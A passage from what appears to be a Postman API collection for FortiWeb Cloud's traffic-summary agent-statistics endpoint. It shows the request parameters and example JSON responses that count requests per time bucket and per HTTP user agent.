\"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660258800000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660259400000,\n                \"data\": []\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 28,\n                \"time\": 1660270200000,\n                \"data\": []\n            },\n            {\n                \"id\": 29,\n                \"time\": 1660270800000,\n                \"data\": []\n            },\n            {\n                \"id\": 30,\n                \"time\": 1660271400000,\n                \"data\": []\n            },\n            {\n                \"id\": 31,\n                \"time\": 1660272000000,\n                \"data\": []\n            },\n            {\n                \"id\": 32,\n                \"time\": 1660272600000,\n                \"data\": []\n            },\n            {\n                \"id\": 33,\n                \"time\": 1660273200000,\n                \"data\": []\n            },\n            {\n                \"id\": 34,\n                \"time\": 1660273800000,\n                \"data\": []\n            },\n            {\n                \"id\": 35,\n                \"time\": 1660274400000,\n                \"data\": []\n            },\n            {\n                \"id\": 36,\n                \"time\": 1660275000000,\n                \"data\": []\n            },\n            {\n                \"id\": 37,\n                \"time\": 1660275600000,\n                \"data\": []\n            },\n            {\n                \"id\": 38,\n                \"time\": 1660276200000,\n                \"data\": []\n            },\n            {\n                \"id\": 39,\n                \"time\": 1660276800000,\n                \"data\": []\n            },\n            {\n                \"id\": 40,\n                \"time\": 1660277400000,\n                \"data\": []\n            },\n            {\n                \"id\": 41,\n                \"time\": 1660278000000,\n                \"data\": []\n            },\n            {\n                \"id\": 42,\n                \"time\": 1660278600000,\n                \"data\": []\n            },\n            {\n                \"id\": 43,\n                \"time\": 1660279200000,\n                \"data\": []\n            },\n            {\n                \"id\": 44,\n                \"time\": 1660279800000,\n                \"data\": []\n            },\n            {\n                \"id\": 45,\n                \"time\": 1660280400000,\n                \"data\": []\n            },\n            {\n                \"id\": 46,\n                \"time\": 1660281000000,\n                \"data\": []\n            },\n            {\n                \"id\": 47,\n                \"time\": 1660281600000,\n                \"data\": []\n            },\n            {\n                \"id\": 48,\n                \"time\": 1660282200000,\n                \"data\": []\n            },\n            {\n                \"id\": 49,\n                \"time\": 1660282800000,\n                \"data\": []\n            },\n            {\n                \"id\": 50,\n                \"time\": 1660283400000,\n                \"data\": []\n            },\n            {\n                \"id\": 51,\n                \"time\": 1660284000000,\n                \"data\": []\n            },\n            {\n                \"id\": 52,\n                \"time\": 1660284600000,\n                \"data\": []\n            },\n            {\n                \"id\": 53,\n                \"time\": 1660285200000,\n                \"data\": []\n            },\n            {\n                \"id\": 54,\n                \"time\": 1660285800000,\n                \"data\": []\n            },\n            {\n                \"id\": 55,\n                \"time\": 1660286400000,\n                \"data\": []\n            },\n            {\n                \"id\": 56,\n                \"time\": 1660287000000,\n                \"data\": []\n            },\n            {\n                \"id\": 57,\n                \"time\": 1660287600000,\n                \"data\": []\n            },\n            {\n                \"id\": 58,\n                \"time\": 1660288200000,\n                \"data\": []\n            },\n            {\n                \"id\": 59,\n                \"time\": 1660288800000,\n                \"data\": []\n            },\n            {\n                \"id\": 60,\n                \"time\": 1660289400000,\n                \"data\": []\n            },\n            {\n                \"id\": 61,\n                \"time\": 1660290000000,\n                \"data\": []\n            },\n            {\n                \"id\": 62,\n                \"time\": 1660290600000,\n                \"data\": []\n            },\n            {\n                \"id\": 63,\n                \"time\": 1660291200000,\n                \"data\": []\n            },\n            {\n                \"id\": 64,\n                \"time\": 1660291800000,\n                \"data\": []\n            },\n            {\n                \"id\": 65,\n                \"time\": 1660292400000,\n                \"data\": []\n            },\n            {\n                \"id\": 66,\n                \"time\": 1660293000000,\n                \"data\": []\n            },\n            {\n                \"id\": 67,\n                \"time\": 1660293600000,\n                \"data\": []\n            },\n            {\n                \"id\": 68,\n                \"time\": 1660294200000,\n                \"data\": []\n            },\n            {\n                \"id\": 69,\n                \"time\": 1660294800000,\n                \"data\": []\n            },\n            {\n                \"id\": 70,\n                \"time\": 1660295400000,\n                \"data\": []\n            },\n            {\n                \"id\": 71,\n                \"time\": 1660296000000,\n                \"data\": []\n            },\n            {\n                \"id\": 72,\n                \"time\": 1660296600000,\n                \"data\": []\n            },\n            {\n                \"id\": 73,\n                \"time\": 1660297200000,\n                \"data\": []\n            },\n            {\n                \"id\": 74,\n                \"time\": 1660297800000,\n                \"data\": []\n            },\n            {\n                \"id\": 75,\n                \"time\": 1660298400000,\n                \"data\": []\n            },\n            {\n                \"id\": 76,\n                \"time\": 1660299000000,\n                \"data\": []\n            },\n            {\n                \"id\": 77,\n                \"time\": 1660299600000,\n                \"data\": []\n            },\n            {\n                \"id\": 78,\n                \"time\": 1660300200000,\n                \"data\": []\n            },\n            {\n                \"id\": 79,\n                \"time\": 1660300800000,\n                \"data\": []\n            },\n            {\n                \"id\": 80,\n                \"time\": 1660301400000,\n                \"data\": []\n            },\n            {\n                \"id\": 81,\n                \"time\": 1660302000000,\n                \"data\": []\n            },\n            {\n                \"id\": 82,\n                \"time\": 1660302600000,\n                \"data\": []\n            },\n            {\n                \"id\": 83,\n                \"time\": 1660303200000,\n                \"data\": []\n            },\n            {\n                \"id\": 84,\n                \"time\": 1660303800000,\n                \"data\": []\n            },\n            {\n                \"id\": 85,\n                \"time\": 1660304400000,\n                \"data\": []\n            },\n            {\n                \"id\": 86,\n                \"time\": 1660305000000,\n                \"data\": []\n            },\n            {\n                \"id\": 87,\n                \"time\": 1660305600000,\n                \"data\": []\n            },\n            {\n                \"id\": 88,\n                \"time\": 1660306200000,\n                \"data\": []\n            },\n            {\n                \"id\": 89,\n                \"time\": 1660306800000,\n                \"data\": []\n            },\n            {\n                \"id\": 90,\n                \"time\": 1660307400000,\n                \"data\": []\n            },\n            {\n                \"id\": 91,\n                \"time\": 1660308000000,\n                \"data\": []\n            },\n            {\n                \"id\": 92,\n                \"time\": 1660308600000,\n                \"data\": []\n            },\n            {\n                \"id\": 93,\n                \"time\": 1660309200000,\n                \"data\": []\n            },\n            {\n                \"id\": 94,\n                \"time\": 1660309800000,\n                \"data\": []\n            },\n            {\n                \"id\": 95,\n                \"time\": 1660310400000,\n                \"data\": []\n            },\n            {\n                \"id\": 96,\n                \"time\": 1660311000000,\n                \"data\": []\n            },\n            {\n                \"id\": 97,\n                \"time\": 1660311600000,\n                \"data\": []\n            },\n            {\n                \"id\": 98,\n                \"time\": 1660312200000,\n                \"data\": []\n            },\n            {\n                \"id\": 99,\n                \"time\": 1660312800000,\n                \"data\": []\n            },\n            {\n                \"id\": 100,\n                \"time\": 1660313400000,\n                \"data\": []\n            },\n            {\n                \"id\": 101,\n                \"time\": 1660314000000,\n                \"data\": []\n            },\n            {\n                \"id\": 102,\n                \"time\": 1660314600000,\n                \"data\": []\n            },\n            {\n                \"id\": 103,\n                \"time\": 1660315200000,\n                \"data\": []\n            },\n            {\n                \"id\": 104,\n                \"time\": 1660315800000,\n                \"data\": []\n            },\n            {\n                \"id\": 105,\n                \"time\": 1660316400000,\n                \"data\": []\n            },\n            {\n                \"id\": 106,\n                \"time\": 1660317000000,\n                \"data\": []\n            },\n            {\n                \"id\": 107,\n                \"time\": 1660317600000,\n                \"data\": []\n            },\n            {\n                \"id\": 108,\n                \"time\": 1660318200000,\n                \"data\": []\n            },\n            {\n                \"id\": 109,\n                \"time\": 1660318800000,\n                \"data\": []\n            },\n            {\n                \"id\": 110,\n                \"time\": 1660319400000,\n                \"data\": []\n            },\n            {\n                \"id\": 111,\n                \"time\": 1660320000000,\n                \"data\": []\n            },\n            {\n                \"id\": 112,\n                \"time\": 1660320600000,\n                \"data\": []\n            },\n            {\n                \"id\": 113,\n                \"time\": 1660321200000,\n                \"data\": []\n            },\n            {\n                \"id\": 114,\n                \"time\": 1660321800000,\n                \"data\": []\n            },\n            {\n                \"id\": 115,\n                \"time\": 1660322400000,\n                \"data\": []\n            },\n            {\n                \"id\": 116,\n                \"time\": 1660323000000,\n                \"data\": []\n            },\n            {\n                \"id\": 117,\n                \"time\": 1660323600000,\n                \"data\": []\n            },\n            {\n                \"id\": 118,\n                \"time\": 1660324200000,\n                \"data\": []\n            },\n            {\n                \"id\": 119,\n                \"time\": 1660324800000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 120,\n                \"time\": 1660325400000,\n                \"data\": []\n            },\n            {\n                \"id\": 121,\n                \"time\": 1660326000000,\n                \"data\": []\n            },\n            {\n                \"id\": 122,\n                \"time\": 1660326600000,\n                \"data\": []\n            },\n            {\n                \"id\": 123,\n                \"time\": 1660327200000,\n                \"data\": []\n            },\n            {\n                \"id\": 124,\n                \"time\": 1660327800000,\n                \"data\": []\n            },\n            {\n                \"id\": 125,\n                \"time\": 1660328400000,\n                \"data\": []\n            },\n            {\n                \"id\": 126,\n                \"time\": 1660329000000,\n                \"data\": []\n            },\n            {\n                \"id\": 127,\n                \"time\": 1660329600000,\n                \"data\": []\n            },\n            {\n                \"id\": 128,\n                \"time\": 1660330200000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 1\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 129,\n                \"time\": 1660330800000,\n                \"data\": [\n                    {\n                        \"source\": \"/\",\n                        \"value\": {\n                            \"count_sum\": 4\n                        }\n                    }\n                ]\n            },\n            {\n                \"id\": 130,\n                \"time\": 1660331400000,\n                \"data\": []\n            },\n            {\n                \"id\": 131,\n                \"time\": 1660332000000,\n                \"data\": []\n            },\n            {\n                \"id\": 132,\n                \"time\": 1660332600000,\n                \"data\": []\n            },\n            {\n                \"id\": 133,\n                \"time\": 1660333200000,\n                \"data\": []\n            },\n            {\n                \"id\": 134,\n                \"time\": 1660333800000,\n                \"data\": []\n            },\n            {\n                \"id\": 135,\n                \"time\": 1660334400000,\n                \"data\": []\n            },\n            {\n                \"id\": 136,\n                \"time\": 1660335000000,\n                \"data\": []\n            },\n            {\n                \"id\": 137,\n                \"time\": 1660335600000,\n                \"data\": []\n            },\n            {\n                \"id\": 138,\n                \"time\": 1660336200000,\n                \"data\": []\n            },\n            {\n                \"id\": 139,\n                \"time\": 1660336800000,\n                \"data\": []\n            },\n            {\n                \"id\": 140,\n                \"time\": 1660337400000,\n                \"data\": []\n            },\n            {\n                \"id\": 141,\n                \"time\": 1660338000000,\n                \"data\": []\n            },\n            {\n                \"id\": 142,\n                \"time\": 1660338600000,\n                \"data\": []\n            },\n            {\n                \"id\": 143,\n                \"time\": 1660339200000,\n                \"data\": []\n            },\n            {\n                \"id\": 144,\n                \"time\": 1660339800000,\n                \"data\": []\n            },\n            {\n                \"id\": 145,\n                \"time\": 1660340400000,\n                \"data\": []\n            }\n        ]\n    }\n}"}],"_postman_id":"6170a87c-b772-4369-8580-d9daf5790303"},{"name":"Get Traffic Log Agent Statics Copy","id":"5ab71b9d-540f-4e87-9fb9-7dda24cb8073","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/agent_statistics?type={{type}}&start_time={{start_time}}&end_time={{end_time}}&page={{page}}&size={{size}}&sort_by={{sort_by}}&filter={{filter}}","urlObject":{"protocol":"https","path":["v1","application",":ep_id","traffic_summary","agent_statistics"],"host":["api","fortiweb-cloud-qa","com"],"query":[{"description":{"content":"<p>the type of query result only support \"summary\" and \"detail\"</p>\n","type":"text/plain"},"key":"type","value":"{{type}}"},{"description":{"content":"<p>the start time of timespan</p>\n","type":"text/plain"},"key":"start_time","value":"{{start_time}}"},{"description":{"content":"<p>the end time of timespan</p>\n","type":"text/plain"},"key":"end_time","value":"{{end_time}}"},{"description":{"content":"<p>the page number of requested information</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>the result table size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"},{"description":{"content":"<p>The field will be sorted</p>\n","type":"text/plain"},"key":"sort_by","value":"{{sort_by}}"},{"description":{"content":"<p>For example, for the Agent details table, the filter is{“srccountry\": “canada, united state”, \"http_agent\": “Mozilla/5.0*”}\"</p>\n","type":"text/plain"},"key":"filter","value":"{{filter}}"}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","type":"any","value":null,"key":"ep_id"}]}},"response":[{"id":"eda01179-6640-4cf5-9f00-13e9dddd15b5","name":"Get Traffic Log Agent Statics Summary","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/agent_statistics?type=summary&start_time=1660254596243&end_time=1660340996243","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","agent_statistics"],"query":[{"key":"type","value":"summary","description":"the type of query result only support \"summary\" and \"detail\""},{"key":"start_time","value":"1660254596243","description":"the start time of timespan"},{"key":"end_time","value":"1660340996243","description":"the end time of timespan"},{"key":"page","value":"{{page}}","description":"the page number of requested information","disabled":true},{"key":"size","value":"{{size}}","description":"the result table size","disabled":true},{"key":"sort_by","value":"{{sort_by}}","description":"The field will be sorted","disabled":true},{"key":"filter","value":"{{filter}}","description":"For example, for the Agent details table, the filter is{“srccountry\": “canada, united state”, \"http_agent\": “Mozilla/5.0*”}\"","disabled":true}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\"details\": {\"curl/7.68.0\": {\"count\": 21.0}, \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\": {\"count\": 17.0}, \"PostmanRuntime/7.29.0\": {\"count\": 6.0}, \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0\": {\"count\": 4.0}, \"Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com\": {\"count\": 3.0}}, \"summary\": {\"start\": \"1660254596243\", \"end\": \"1660340996243\", \"count\": 145, \"graph\": [{\"id\": 1, \"time\": 1660254000000, \"data\": []}, {\"id\": 2, \"time\": 1660254600000, \"data\": []}, {\"id\": 3, \"time\": 1660255200000, \"data\": []}, {\"id\": 4, \"time\": 1660255800000, \"data\": []}, {\"id\": 5, \"time\": 1660256400000, \"data\": []}, {\"id\": 6, \"time\": 1660257000000, \"data\": []}, {\"id\": 7, \"time\": 1660257600000, \"data\": []}, {\"id\": 8, \"time\": 1660258200000, \"data\": []}, {\"id\": 9, \"time\": 1660258800000, \"data\": [{\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\", \"value\": {\"count_sum\": 2.0}}]}, {\"id\": 10, \"time\": 1660259400000, \"data\": [{\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\", \"value\": {\"count_sum\": 4.0}}]}, {\"id\": 11, \"time\": 1660260000000, \"data\": []}, {\"id\": 12, \"time\": 1660260600000, \"data\": []}, {\"id\": 13, \"time\": 1660261200000, \"data\": []}, {\"id\": 14, \"time\": 1660261800000, \"data\": []}, {\"id\": 15, \"time\": 1660262400000, \"data\": []}, {\"id\": 16, \"time\": 1660263000000, \"data\": []}, {\"id\": 17, \"time\": 1660263600000, \"data\": []}, {\"id\": 18, \"time\": 1660264200000, \"data\": []}, {\"id\": 19, \"time\": 1660264800000, \"data\": []}, {\"id\": 20, \"time\": 1660265400000, \"data\": []}, {\"id\": 21, \"time\": 1660266000000, \"data\": []}, {\"id\": 22, \"time\": 1660266600000, \"data\": []}, {\"id\": 23, \"time\": 1660267200000, \"data\": []}, {\"id\": 24, \"time\": 1660267800000, \"data\": []}, {\"id\": 25, \"time\": 1660268400000, \"data\": []}, {\"id\": 26, \"time\": 1660269000000, \"data\": []}, {\"id\": 27, \"time\": 1660269600000, \"data\": []}, {\"id\": 28, \"time\": 1660270200000, \"data\": []}, {\"id\": 29, \"time\": 1660270800000, \"data\": []}, {\"id\": 30, \"time\": 1660271400000, \"data\": []}, {\"id\": 31, \"time\": 1660272000000, \"data\": []}, {\"id\": 32, \"time\": 1660272600000, \"data\": []}, {\"id\": 33, \"time\": 1660273200000, \"data\": []}, {\"id\": 34, \"time\": 1660273800000, \"data\": []}, {\"id\": 35, \"time\": 1660274400000, \"data\": []}, {\"id\": 36, \"time\": 1660275000000, \"data\": []}, {\"id\": 37, \"time\": 1660275600000, \"data\": []}, {\"id\": 38, \"time\": 1660276200000, \"data\": []}, {\"id\": 39, \"time\": 1660276800000, \"data\": []}, {\"id\": 40, \"time\": 1660277400000, \"data\": []}, {\"id\": 41, \"time\": 1660278000000, \"data\": []}, {\"id\": 42, \"time\": 1660278600000, \"data\": []}, {\"id\": 43, \"time\": 1660279200000, \"data\": []}, {\"id\": 44, \"time\": 1660279800000, \"data\": []}, {\"id\": 45, \"time\": 1660280400000, \"data\": []}, {\"id\": 46, \"time\": 1660281000000, \"data\": []}, {\"id\": 47, \"time\": 1660281600000, \"data\": []}, {\"id\": 48, \"time\": 1660282200000, \"data\": []}, {\"id\": 49, \"time\": 1660282800000, \"data\": []}, {\"id\": 50, \"time\": 1660283400000, \"data\": []}, {\"id\": 51, \"time\": 1660284000000, \"data\": []}, {\"id\": 52, \"time\": 1660284600000, \"data\": []}, {\"id\": 53, \"time\": 1660285200000, \"data\": []}, {\"id\": 54, \"time\": 1660285800000, \"data\": []}, {\"id\": 55, \"time\": 1660286400000, \"data\": []}, {\"id\": 56, \"time\": 1660287000000, \"data\": []}, {\"id\": 57, \"time\": 1660287600000, \"data\": []}, {\"id\": 58, \"time\": 1660288200000, \"data\": []}, {\"id\": 59, \"time\": 1660288800000, \"data\": []}, {\"id\": 60, \"time\": 1660289400000, \"data\": []}, {\"id\": 61, \"time\": 1660290000000, \"data\": []}, {\"id\": 62, \"time\": 1660290600000, \"data\": []}, {\"id\": 63, \"time\": 1660291200000, \"data\": []}, {\"id\": 64, \"time\": 1660291800000, \"data\": []}, {\"id\": 65, \"time\": 1660292400000, \"data\": []}, {\"id\": 66, \"time\": 1660293000000, \"data\": []}, {\"id\": 67, \"time\": 1660293600000, \"data\": []}, {\"id\": 68, \"time\": 1660294200000, \"data\": []}, {\"id\": 69, \"time\": 1660294800000, \"data\": []}, {\"id\": 70, \"time\": 1660295400000, \"data\": []}, {\"id\": 71, \"time\": 1660296000000, \"data\": []}, {\"id\": 72, \"time\": 1660296600000, \"data\": []}, {\"id\": 73, \"time\": 1660297200000, \"data\": []}, {\"id\": 74, \"time\": 1660297800000, \"data\": []}, {\"id\": 75, \"time\": 1660298400000, \"data\": []}, {\"id\": 76, \"time\": 1660299000000, \"data\": []}, {\"id\": 77, \"time\": 1660299600000, \"data\": []}, {\"id\": 78, \"time\": 1660300200000, \"data\": []}, {\"id\": 79, \"time\": 1660300800000, \"data\": []}, {\"id\": 80, \"time\": 1660301400000, \"data\": []}, {\"id\": 81, \"time\": 1660302000000, \"data\": []}, {\"id\": 82, \"time\": 1660302600000, \"data\": []}, {\"id\": 83, \"time\": 1660303200000, \"data\": []}, {\"id\": 84, \"time\": 1660303800000, \"data\": []}, {\"id\": 85, \"time\": 1660304400000, \"data\": []}, {\"id\": 86, \"time\": 1660305000000, \"data\": []}, {\"id\": 87, \"time\": 1660305600000, \"data\": []}, {\"id\": 88, \"time\": 1660306200000, \"data\": []}, {\"id\": 89, \"time\": 1660306800000, \"data\": []}, {\"id\": 90, \"time\": 1660307400000, \"data\": []}, {\"id\": 91, \"time\": 1660308000000, \"data\": []}, {\"id\": 92, \"time\": 1660308600000, \"data\": []}, {\"id\": 93, \"time\": 1660309200000, \"data\": []}, {\"id\": 94, \"time\": 1660309800000, \"data\": []}, {\"id\": 95, \"time\": 1660310400000, \"data\": []}, {\"id\": 96, \"time\": 1660311000000, \"data\": []}, {\"id\": 97, \"time\": 1660311600000, \"data\": []}, {\"id\": 98, \"time\": 1660312200000, \"data\": []}, {\"id\": 99, \"time\": 1660312800000, \"data\": []}, {\"id\": 100, \"time\": 1660313400000, \"data\": []}, {\"id\": 101, \"time\": 1660314000000, \"data\": []}, {\"id\": 102, \"time\": 1660314600000, \"data\": []}, {\"id\": 103, \"time\": 1660315200000, \"data\": []}, {\"id\": 104, \"time\": 1660315800000, \"data\": []}, {\"id\": 105, \"time\": 1660316400000, \"data\": []}, {\"id\": 106, \"time\": 1660317000000, \"data\": []}, {\"id\": 107, \"time\": 1660317600000, \"data\": []}, {\"id\": 108, \"time\": 1660318200000, \"data\": []}, {\"id\": 109, \"time\": 1660318800000, \"data\": []}, {\"id\": 110, \"time\": 1660319400000, \"data\": []}, {\"id\": 111, \"time\": 1660320000000, \"data\": []}, {\"id\": 112, \"time\": 1660320600000, \"data\": []}, {\"id\": 113, \"time\": 1660321200000, \"data\": []}, {\"id\": 114, \"time\": 1660321800000, \"data\": []}, {\"id\": 115, \"time\": 1660322400000, \"data\": []}, {\"id\": 116, \"time\": 1660323000000, \"data\": []}, {\"id\": 117, \"time\": 1660323600000, \"data\": []}, {\"id\": 118, \"time\": 1660324200000, \"data\": []}, {\"id\": 119, \"time\": 1660324800000, \"data\": [{\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\", \"value\": {\"count_sum\": 1.0}}]}, {\"id\": 120, \"time\": 1660325400000, \"data\": []}, {\"id\": 121, \"time\": 1660326000000, \"data\": [{\"source\": \"PostmanRuntime/7.29.0\", \"value\": {\"count_sum\": 3.0}}]}, {\"id\": 122, \"time\": 1660326600000, \"data\": []}, {\"id\": 123, \"time\": 1660327200000, \"data\": []}, {\"id\": 124, \"time\": 1660327800000, \"data\": [{\"source\": \"curl/7.68.0\", \"value\": {\"count_sum\": 3.0}}]}, {\"id\": 125, \"time\": 1660328400000, \"data\": [{\"source\": \"curl/7.68.0\", \"value\": {\"count_sum\": 12.0}}]}, {\"id\": 126, \"time\": 1660329000000, \"data\": [{\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\", \"value\": {\"count_sum\": 5.0}}, {\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0\", \"value\": {\"count_sum\": 4.0}}, {\"source\": \"PostmanRuntime/7.29.0\", \"value\": {\"count_sum\": 3.0}}, {\"source\": \"curl/7.68.0\", \"value\": {\"count_sum\": 1.0}}]}, {\"id\": 127, \"time\": 1660329600000, \"data\": []}, {\"id\": 128, \"time\": 1660330200000, \"data\": [{\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\", \"value\": {\"count_sum\": 1.0}}]}, {\"id\": 129, \"time\": 1660330800000, \"data\": [{\"source\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML  like Gecko) Chrome/104.0.0.0 Safari/537.36\", \"value\": {\"count_sum\": 4.0}}, {\"source\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) SkypeUriPreview Preview/0.5 skype-url-preview@microsoft.com\", \"value\": {\"count_sum\": 3.0}}, {\"source\": \"curl/7.68.0\", \"value\": {\"count_sum\": 4.0}}]}, {\"id\": 130, \"time\": 1660331400000, \"data\": []}, {\"id\": 131, \"time\": 1660332000000, \"data\": [{\"source\": \"curl/7.68.0\", \"value\": {\"count_sum\": 1.0}}]}, {\"id\": 132, \"time\": 1660332600000, \"data\": []}, {\"id\": 133, \"time\": 1660333200000, \"data\": []}, {\"id\": 134, \"time\": 1660333800000, \"data\": []}, {\"id\": 135, \"time\": 1660334400000, \"data\": []}, {\"id\": 136, \"time\": 1660335000000, \"data\": []}, {\"id\": 137, \"time\": 1660335600000, \"data\": []}, {\"id\": 138, \"time\": 1660336200000, \"data\": []}, {\"id\": 139, \"time\": 1660336800000, \"data\": []}, {\"id\": 140, \"time\": 1660337400000, \"data\": []}, {\"id\": 141, \"time\": 1660338000000, \"data\": []}, {\"id\": 142, \"time\": 1660338600000, \"data\": []}, {\"id\": 143, \"time\": 1660339200000, \"data\": []}, {\"id\": 144, \"time\": 1660339800000, \"data\": []}, {\"id\": 145, \"time\": 1660340400000, \"data\": []}]}}"},{"id":"3721af65-1592-4298-8bd6-b25ce8f69891","name":"Get Traffic Log Agent Statics Detail","originalRequest":{"method":"GET","header":[],"url":{"raw":"https://api.fortiweb-cloud-qa.com/v1/application/:ep_id/traffic_summary/agent_statistics?type=details&start_time=1660254746226&end_time=1660341146226&page=1&size=5&sort_by=total_number&filter=%7B%22http_agent%22%3A%22curl%2F7.68.0%22%7D","protocol":"https","host":["api","fortiweb-cloud-qa","com"],"path":["v1","application",":ep_id","traffic_summary","agent_statistics"],"query":[{"key":"type","value":"details"},{"key":"start_time","value":"1660254746226"},{"key":"end_time","value":"1660341146226"},{"key":"page","value":"1"},{"key":"size","value":"5"},{"key":"sort_by","value":"total_number"},{"key":"filter","value":"%7B%22http_agent%22%3A%22curl%2F7.68.0%22%7D"}],"variable":[{"id":"e2929869-66a7-45fb-ba0b-39be50244bc7","key":"ep_id","value":null}]}},"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"details\": {\n        \"curl/7.68.0\": {\n            \"count\": 21\n        }\n    },\n    \"summary\": {\n        \"start\": \"1660254746226\",\n        \"end\": \"1660341146226\",\n        \"count\": 145,\n        \"graph\": [\n            {\n                \"id\": 1,\n                \"time\": 1660254600000,\n                \"data\": []\n            },\n            {\n                \"id\": 2,\n                \"time\": 1660255200000,\n                \"data\": []\n            },\n            {\n                \"id\": 3,\n                \"time\": 1660255800000,\n                \"data\": []\n            },\n            {\n                \"id\": 4,\n                \"time\": 1660256400000,\n                \"data\": []\n            },\n            {\n                \"id\": 5,\n                \"time\": 1660257000000,\n                \"data\": []\n            },\n            {\n                \"id\": 6,\n                \"time\": 1660257600000,\n                \"data\": []\n            },\n            {\n                \"id\": 7,\n                \"time\": 1660258200000,\n                \"data\": []\n            },\n            {\n                \"id\": 8,\n                \"time\": 1660258800000,\n                \"data\": []\n            },\n            {\n                \"id\": 9,\n                \"time\": 1660259400000,\n                \"data\": []\n            },\n            {\n                \"id\": 10,\n                \"time\": 1660260000000,\n                \"data\": []\n            },\n            {\n                \"id\": 11,\n                \"time\": 1660260600000,\n                \"data\": []\n            },\n            {\n                \"id\": 12,\n                \"time\": 1660261200000,\n                \"data\": []\n            },\n            {\n                \"id\": 13,\n                \"time\": 1660261800000,\n                \"data\": []\n            },\n            {\n                \"id\": 14,\n                \"time\": 1660262400000,\n                \"data\": []\n            },\n            {\n                \"id\": 15,\n                \"time\": 1660263000000,\n                \"data\": []\n            },\n            {\n                \"id\": 16,\n                \"time\": 1660263600000,\n                \"data\": []\n            },\n            {\n                \"id\": 17,\n                \"time\": 1660264200000,\n                \"data\": []\n            },\n            {\n                \"id\": 18,\n                \"time\": 1660264800000,\n                \"data\": []\n            },\n            {\n                \"id\": 19,\n                \"time\": 1660265400000,\n                \"data\": []\n            },\n            {\n                \"id\": 20,\n                \"time\": 1660266000000,\n                \"data\": []\n            },\n            {\n                \"id\": 21,\n                \"time\": 1660266600000,\n                \"data\": []\n            },\n            {\n                \"id\": 22,\n                \"time\": 1660267200000,\n                \"data\": []\n            },\n            {\n                \"id\": 23,\n                \"time\": 1660267800000,\n                \"data\": []\n            },\n            {\n                \"id\": 24,\n                \"time\": 1660268400000,\n                \"data\": []\n            },\n            {\n                \"id\": 25,\n                \"time\": 1660269000000,\n                \"data\": []\n            },\n            {\n                \"id\": 26,\n                \"time\": 1660269600000,\n                \"data\": []\n            },\n            {\n                \"id\": 27,\n                \"time\": 1660270200000,\n                